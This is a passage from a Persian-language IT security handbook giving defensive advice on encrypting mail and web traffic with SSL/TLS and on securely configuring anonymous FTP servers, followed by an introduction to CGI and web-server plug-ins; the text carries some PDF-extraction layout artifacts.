ﺷﻤﺎ ﺍﺗﺼﺎﻻﺕ ﺭﻣﺰﻧﮕﺎﺭﻱﺷﺪﺓ SSL/TLSﺑﺮﻗﺮﺍﺭ ﻛﻨﻨﺪ؛ ﺍﻟﺒﺘﻪ ﺑﻪ ﺷﺮﻃﻲ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺍﻳـﻦ
ﺍﺗﺼﺎﻻﺕ ﺭﺍ ﺑﭙﺬﻳﺮﺩ ﻭ ﻳﺎ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﻻﺯﻡ ﺑﺪﺍﻧﺪ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻠﻬﺎ ﺑﺼﻮﺭﺕ ﭘﻴﺶﻓﺮﺽ ،ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﺭﺍ ﺑـﺪﻭﻥ
ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻧﺘﻘﺎﻝ ﻣﻲﺩﻫﻨﺪ ،ﺍﻟﺰﺍﻣﻲ ﻛﺮﺩﻥ ﺍﺗﺼﺎﻻﺕ SSL/TLSﺑﺎﻋﺚ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﺳﻄﺢ ﺣﻔﺎﻇﺘﻲ ﺯﻳـﺎﺩﻱ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﻫﻤﻴﻨﻄـﻮﺭ
٢١٠
ﭘﻴﺎﻣﻬﺎﻱ ﺁﻧﺎﻥ ﻣﻲﺷﻮﺩ.
ﻳﻚ ﺟﺎﻳﮕﺰﻳﻦ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲ ﺭﻣﺰﻧﮕﺎﺭﻱﻧﺸﺪﺓ POPﻳﺎ IMAPﺁﻥ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺒﺘﻨـﻲ
ﺑﺮ ﻭﺏ ،ﺍﺯ ﻃﺮﻳﻖ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﺻﻨﺪﻭﻕ ﭘﺴﺘﻲﺷﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﻨﻴﻢ .ﻳﻚ ﻣﺰﻳﺖ ﻣﻬـﻢ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ webmail
ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻮﺳﻴﻠﺔ SSL/TLSﺍﻳﻤﻦ ﺷﻮﺩ ،ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﻫﻤﺔ ﻣﺮﻭﺭﮔﺮﻫـﺎﻱ ﻭﺏ ﺧﻮﺍﻫﻨـﺪ ﺗﻮﺍﻧـﺴﺖ ﺍﺯ
ﻳﻚ ﺍﺗﺼﺎﻝ ﺍﻣﻦ ﺑﻬﺮﻩ ﺑﺒﺮﻧﺪ.
ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺍﺧﻠﻲ ﻧﻴﺰ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ scpﻭ ) sftpﺑﺨﺸﻲ ﺍﺯ ﻣﺠﻤﻮﻋﺔ (SSHﻭ ﻳﺎ
SSLﺍﻳﻤﻦﺷﺪﺓ Web-DAVﻣﻨﺘﻘﻞ ﻛﻨﻨﺪ.
ﺍﮔﺮ ﺑﻨﺎ ﺍﺳﺖ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ FTPﻧﺎﺷﻨﺎﺱ ٢١١ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ ﺗﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﺑﺘﻮﺍﻧﻨﺪ ﻓﺎﻳﻠﻬﺎ ﺭﺍ downloadﻭ uploadﻛﻨﻨﺪ،
ﺍﻳﻦ ﺧﻂﻣﺸﻲﻫﺎ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ:
ﺑﺎ ﺩﻗﺖ ﻣﺴﺘﻨﺪﺍﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ FTPﺧﻮﺩ ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺑﺪﺭﺳﺘﻲ ﻣﺤـﺪﻭﺩﺓ ﻓﺎﻳﻠﻬـﺎﻱ ﻧﺎﺷـﻨﺎﺱ ﺭﺍ ﺗﻨﻈـﻴﻢ ﻛﻨﻴـﺪ ﺗـﺎ •
ﻛﺎﺭﺑﺮﺍﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺗﻨﻬﺎ ﺍﺯ ﺷﺎﺧﻪﻫﺎﻳﻲ ﻛﻪ ﺷﻤﺎ ﻣﺸﺨﺺ ﻧﻤﻮﺩﻩﺍﻳﺪ ﻓﺎﻳﻞ downloadﻛﻨﻨﺪ ﻭ ﺩﺭ ﺁﻥ ﺷﺎﺧﻪﻫﺎ ﻗﺎﺩﺭ ﺑـﻪ ﺣـﺬﻑ ﻓﺎﻳﻠﻬـﺎ
ﺗﻌﻮﻳﺾ ﻧﺎﻡ ﻓﺎﻳﻠﻬﺎ ،ﻭ ﻳﺎ ﺗﻐﻴﻴﺮ ﺳﺎﺧﺘﺎﺭ ﺷﺎﺧﻪﻫﺎ ﻧﺒﺎﺷﻨﺪ؛
۲۰۹ﺩﺭﺣﻘﻴﻘﺖ ﺣﺠﻢ ﺑﺎﻻﻱ ﺍﺭﺳﺎﻝ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺿﻮﺍﺑﻂ ﻗﺎﻧﻮﻧﻲ ﻧﺎﻛﺎﺭﺁﻣﺪﻱ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺩﺍﺭﻧﺪ ﺁﻧﭽﻨﺎﻥ ﺑﻪ ﺍﻋﺘﺒﺎﺭ ﻣﻠﻲ ﺁﻥ ﻛﺸﻮﺭﻫﺎ ﺿﺮﺑﻪ ﺯﺩﻩ ﻛـﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﺭﺍﻫﺒﺮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺘﻲ ﺑﻌﻀﹰﺎ ﺍﺯ ﭘﺬﻳﺮﻓﺘﻦ ﻫﺮ ﻧﺎﻣﺔ ﺍﻛﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺑﺎﺷﺪ ﺳﺮ ﺑﺎﺯ ﻣﻲﺯﻧﻨﺪ.
۲۱۰ﻫﻢ POPﻭ ﻫﻢ IMAPﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺘﻲ ﻛﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﻧﺸﺪﻩ ﺭﺍ ﺭﻭﻱ ﺷﺒﻜﻪ ﻣﻨﺘﻘﻞ ﻧﻤﻲﻛﻨﻨﺪ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ ،ﺍﻣـﺎ ﻓﻌـﺎﻝﻛـﺮﺩﻥ ﺁﻧﻬـﺎ
ﺑﻴﺶ ﺍﺯ SSL/TLSﺯﺣﻤﺖ ﺩﺍﺭﺩ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﻛﻨﺘﺮﻝ ﺻﺤﺖ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﻴﺎﻡ ﺭﺍ ﺗﺄﻣﻴﻦ ﻧﻤﻲﻛﻨﻨﺪ.
211 Anonymous FTP Server
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٥٨
ﺍﺯ ﺍﺭﺍﺋﻪ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﺼﻮﺭﺕ ﻓﺎﻳﻠﻬﺎﻱ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﻣﺜﻞ ﻓﺎﻳﻠﻬﺎﻱ ﻓﺸﺮﺩﻩﺷﺪﻩ ﻭ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﺭﺷﻴﻮﻱ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ •
ﻗﺎﺑﻞ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﺣﺘﺮﺍﺯ ﻧﻤﺎﻳﻴﺪ .ﺭﻭﻱ ﻣﺎﺷﻴﻨﻬﺎﻱ ،Unixﺍﮔﺮ ﺧﻮﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ FTPﻗﺎﺑﻠﻴﺖ ﻧﻤﺎﻳﺶ ﺷـﺎﺧﻪﻫـﺎ ﺭﺍ
ﺩﺍﺭﺩ ،ﺣﺘﻲ ﺑﻪ ﻓﺎﻳﻞ lsﻧﻴﺰ ﺍﺟﺎﺯﺓ ﺍﺟﺮﺍ ﻧﺪﻫﻴﺪ؛
ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ FTPﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻧﻄﺒﺎﻕ uidﻣﺎﻟﻜﺎﻥ ﻓﺎﻳﻠﻬﺎ ﺑﺎ ﻧﺎﻣﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺍﺯ ﻳﻚ ﻓﺎﻳﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ،ﺑـﺮﺍﻱ •
ﺍﻳﻨﻜﺎﺭ ﺍﺯ ﻓﺎﻳﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺻﻠﻲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ ،ﺑﻠﻜﻪ ﻳﻚ ﻓﺎﻳﻞ ﺛﺎﻧﻮﻳﻪ ﺩﺭﺳﺖ ﻛﻨﻴﺪ ﻭ ﺗﻨﻬﺎ ﺍﻃﻼﻋﺎﺕ ﻧﻪﭼﻨﺪﺍﻥ ﻣﻬـﻢ
ﺭﺍ ﺩﺭ ﺁﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ )ﻳﺎ ﺍﺻ ﹰﻼ ﺍﺯ ﻓﺎﻳﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ ﻭ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺑﺘﻮﺍﻧﻨﺪ uidﻫﺎ ﺭﺍ ﺑﺒﻴﻨﻨﺪ(؛ ﻭ
ﺍﮔﺮ ﺍﺟﺎﺯﺓ uploadﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻣﻲﺩﻫﻴﺪ ،ﺍﻳﻦ ﺍﺟﺎﺯﻩ ﺭﺍ ﺑﻪ ﺷﺎﺧﻪﻫﺎﻳﻲ ﻣﺠـﺰﺍ ﺍﺯ ﺷـﺎﺧﻪﻫـﺎﻳﻲ ﻛـﻪ ﺍﺯ ﺁﻧﻬـﺎ downloadﻫـﻢ ﺍﻧﺠـﺎﻡ •
ﻣﻲﺷﻮﺩ ﺑﺪﻫﻴﺪ ﻭ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺎﺩﺭ ﺑﻪ downloadﻛﺮﺩﻥ ﻓﺎﻳﻠﻬﺎﻱ uploadﺷﺪﻩ ﻧﻴﺴﺘﻨﺪ .ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴـﺐ ﺷـﻤﺎ ﺭﺍﻩ
ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺻﺤﻴﺢ ﺍﺯ ﺗﺮﺍﻓﻴﻚ ﭘﺎﻳﮕﺎﻩ FTPﺧﻮﺩ ﺑﺮﺍﻱ downloadﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣـﺴﺮﻭﻗﻪ ﺭﺍ ﻣـﺴﺪﻭﺩ ﻛـﺮﺩﻩﺍﻳـﺪ .ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ uploadﺷﺪﻩ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﺧﺎﺻﻲ ﺩﺭ ﻧﺎﻡ ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﻓﻀﺎﻳﻲ
ﻛﻪ uploadﺩﺭ ﺁﻥ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﺩﺭ ﻳﻚ partitionﻣﺠﺰﺍ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﭘﺮ ﺷﺪﻥ ﺁﻥ ﺁﺳﻴﺒﻲ ﺑﻪ ﺳﺎﻳﺮ ﺧﺪﻣﺎﺕ ﻧﻤﻲﺯﻧـﺪ .ﺑـﻪ ﺍﻳـﻦ
ﺗﺮﺗﻴﺐ ﺍﺯ ﻣﺤﻮ ﻭ ﺣﺬﻑ ﺷﺪﻥ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺩﺭ ﻳﻚ ﺗﻬﺎﺟﻢ ﺍﻃﻼﻋﺎﺗﻲ ﺟﻠﻮﮔﻴﺮﻱ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺑﻄﻮﺭ ﻛﻠﻲ ﺳﺮﻭﻳﺲ FTPﻏﻴﺮﻧﺎﺷﻨﺎﺱ ٢١٢ﺍﺭﺍﺋﻪ ﻧﺪﻫﻴﺪ ،ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺁﻧﺮﺍ ﺍﺯ ﻃﺮﻳـﻖ ﻳـﻚ ﺗﻮﻧـﻞ VPNﻭ ﻳـﺎ ﻳـﻚ
ﭘﻮﺷﺶ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﺎﻧﻨﺪ (http://safetp.cs.berkley.edu) SafeTPﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ.
ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﻃﻼﻋﺎﺕ
ﺍﮔﺮ ﻗﺮﺍﺭ ﺍﺳﺖ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﺭﺍ ﺍﻧﺘﻘﺎﻝ ﺩﻫﻴﺪ ،ﻳﻚ ﮔﻮﺍﻫﻲ SSLﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺑﻲ ﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻛﻪ
ﻗﺎﺑﻠﻴﺖ SSLﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﻫﻢ Apacheﻭ ﻫـﻢ IISﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑﮕﻮﻧـﻪﺍﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﺷـﻮﻧﺪ ﻛـﻪ ﺍﺯ SSLﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ( .ﺍﮔـﺮ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﻳـﻚ
interanetﻃﺮﺍﺣﻲ ﻛﻨﻴﺪ )ﻳﺎ ﻳﻚ internetﻛﻪ ﺑﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﻛﺎﺭﻣﻨﺪﺍﻧﺘﺎﻥ ﻣﺤﺪﻭﺩ ﻣﻲﺷﻮﺩ( ،ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﻳـﻚ ﮔـﻮﺍﻫﻲ SSLﺍﺳـﺘﻔﺎﺩﻩ
ﻼ ﻳﻚ ﺭﻭﺵ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﻳـﺪ .ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ ﻛﻨﻴﺪ ﻛﻪ ﺗﻮﺳﻂ ﺧﻮﺩﺗﺎﻥ ﺑﻪ ﺍﻣﻀﺎ ﺭﺳﻴﺪﻩ ،ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﺍﺻ ﹰ
ﻗﺎﻋﺪﺗﹰﺎ ﻣﺠﺒﻮﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﮔﻮﺍﻫﻲ SSLﺭﺍ ﺍﺯ ﻣﺮﺍﻛﺰ ﻣﻌﺘﺒﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﺜﻞ - VeriSignﻛﻪ ﮔﻮﺍﻫﻲﻫـﺎﻱ ﺍﻣـﻀﺎﺷﺪﺓ ﺁﻥ ﺩﺭ ﺑﻴـﺸﺘﺮ
ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻣﻌﺮﻭﻑ ﻭﺏ ﻭﺟﻮﺩ ﺩﺍﺭﺩ -ﺑﺨﺮﻳﺪ .ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﮔﻮﺍﻫﻲﻫﺎﻱ SSLﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻓـﺼﻞ ﭼﻬـﺎﺭﻡ ﺍﺯ ﻫﻤـﻴﻦ
ﺑﺨﺶ ﺭﺟﻮﻉ ﻧﻤﺎﻳﻴﺪ.
ﺍﮔﺮ ﺍﺯ SSLﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴﺪ ،ﺗﻤﺎﻡ ﺍﻧﺘﻘﺎﻻﺕ - HTTPﺷﺎﻣﻞ ﻧﺎﻣﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻛـﻪ ﺩﺭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺍﺑﺘـﺪﺍﻳﻲ
HTTPﻭ ﻳﺎ ﻫﺮ ﻧﻮﻉ ﻓﺮﻣﻲ ﻛﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺁﻧﺮﺍ ﻣﻨﺘﻘﻞ ﻣﻲﻛﻨﺪ -ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔﺬﺍﺭﻱﻧﺸﺪﻩ ﺍﻧﺠﺎﻡ ﻣـﻲﺷـﻮﻧﺪ .ﺩﺭ ﺑﻴـﺸﺘﺮ ﻣـﻮﺍﺭﺩ ﺍﮔـﺮ
ﺑﺨﻮﺍﻫﻴﺪ ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﻴﺪ ،ﭼﺎﺭﻩﺍﻱ ﻧﺪﺍﺭﻳﺪ ﺟﺰ ﺍﻳﻨﻜﻪ SSLﺭﺍ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﺎﻳﻴﺪ ﺗﺎ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ ﺣﻔﺎﻇﺖ ﺑﻌﻤـﻞ ﺁﻭﺭﺩﻩ
ﺑﺎﺷﻴﺪ.
CGI
٢١٣
CGIﺍﻭﻟﻴﻦ ﺍﺑﺰﺍﺭ ﮔﺴﺘﺮﺵ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺑﻮﺩ .ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ URLﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﺑﺮﻧﺎﻣـﺔ CGIﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ
ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﺩ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺮﻧﺎﻣﺔ CGIﻣﺬﻛﻮﺭ ﺭﺍ ﺩﺭ ﻳﻚ ﭘﺮﺩﺍﺯﺓ ﻣﺠﺰﺍ ﺍﺟﺮﺍ ﻣﻲﻧﻤﺎﻳﺪ ،ﺧﺮﻭﺟﻲ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺩﺭﻳﺎﻓـﺖ ﻣـﻲﻛﻨـﺪ ،ﻭ ﻧﺘـﺎﻳﺞ
ﺩﺭﺧﻮﺍﺳﺖﺷﺪﻩ ﺭﺍ ﺑﻪ ﻣﺮﻭﺭﮔﺮ ﻭﺑﻲ ﻛﻪ ﺁﻧﺮﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻛﺮﺩﻩ ﺑﻮﺩ ﻣﻲﻓﺮﺳﺘﺪ .ﺁﺭﮔﻮﻣﺎﻧﻬﺎﻱ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ CGIﺑﻌﻨـﻮﺍﻥ ﻣﺘﻐﻴﺮﻫـﺎﻱ ﻣﺤﻴﻄـﻲ
ﻛﺪﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﺜﻞ ﻭﺭﻭﺩﻱﻫﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ.
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ CGIﻣﻲﺗﻮﺍﻧﻨﺪ queryﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﻧﺪ ﻭ ﻧﺘﺎﻳﺞ ﺁﻧﺮﺍ ﻧﻤﺎﻳﺶ ﺩﻫﻨﺪ ،ﺍﻓﺮﺍﺩ ﺭﺍ ﻗﺎﺩﺭ ﻛﻨﻨﺪ ﻛﻪ ﻣﺤﺎﺳﺒﺎﺕ ﭘﻴﭽﻴﺪﺓ
ﻣﺎﻟﻲ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ،ﻭ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻣﻜﺎﻥ ﺩﻫﻨﺪ ﻛﻪ ﺑﺎ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻣﺤﻴﻂ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﮔﻔﺘﮕﻮ ﺑﭙﺮﺩﺍﺯﻧﺪ .ﺩﺭ ﻭﺍﻗﻊ ﺑﺎﻳﺪ ﮔﻔﺖ ﻛﻪ ﻫﺮ ﻗﺎﺑﻠﻴﺖ
ﻧﻮﺁﻭﺭﺍﻧﺔ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ -ﺍﺯ ﻣﻮﺗﻮﺭﻫﺎﻱ ﺟﺴﺘﺠﻮ ﮔﺮﻓﺘﻪ ﺗﺎ ﺻﻔﺤﺎﺕ ﻭﺑﻲ ﻛﻪ ﺍﺟﺎﺯﺓ ﺭﺩﻳﺎﺑﻲ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﻣﻲﺩﻫﻨﺪ -ﺩﺭ ﺍﺑﺘﺪﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ CGIﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺑﻮﺩﻧﺪ.
ﺑﺨﺶ ﭘﻨﺠﻢ
٢١٥
Plug-inﻫﺎModule ،ﻫﺎﻱ ﻗﺎﺑﻞ ﺑﺎﺭﮔﺬﺍﺭﻱ ٢١٤،ﻭ ﻭﺍﺳﻄﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﺍﻱ )APIﻫﺎ(
ﻻ ﺑﻪ ﺯﺑﺎﻧﻬﺎﻱ C
ﺩﻭﻣﻴﻦ ﺗﻜﻨﻴﻜﻲ ﻛﻪ ﺑﺮﺍﻱ ﺗﻮﺳﻌﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪ ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ moduleﻫﺎﻳﻲ ﺑﻮﺩ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﻳﺎ C++ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺑﻮﺩﻧﺪ .ﺍﻳﻦ moduleﻫﺎ ﺩﺭ ﺯﻣﺎﻥ ﺍﺟﺮﺍ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪPlug-in .ﻫﺎmodule ،ﻫﺎ ،ﻭ
APIﻫﺎ ﺭﺍﻩ ﺳﺮﻳﻊﺗﺮﻱ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﻫﺴﺘﻨﺪ ،ﭼﻮﻥ ﺩﺭﺻﻮﺭﺕ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺁﻧﻬﺎ ﻧﻴﺎﺯﻱ ﻧﻴﺴﺖ ﻛﻪ ﺑﻪ ﺍﺯﺍﻱ ﻫﺮ ﺗﻌﺎﻣﻞ ﻭﺏ ﻳﻚ ﭘﺮﺩﺍﺯﺓ ﺟﺪﻳﺪ ﺷﺮﻭﻉ ﺷﻮﺩ ﻭ ﺩﺭﻋﻮﺽ ﺧﻮﺩ ﭘـﺮﺩﺍﺯﺓ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ ،ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﺱ ﺧﻮﺩ ﺁﻥ ﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻭﺭﺩ .ﺍﻣﺎ ﺍﻳﻦ ﺗﻜﻨﻴﻜﻬﺎ ﻳﻚ ﻧﻘﺺ ﺑﺎﺭﺯ ﺩﺍﺭﻧﺪ :ﺑﺮﻧﺎﻣﺔ plug-inﻣﻤﻜـﻦ ﺍﺳـﺖ
ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺩﺭ ﻓﻀﺎﻱ ﺁﺩﺭ ﹺ
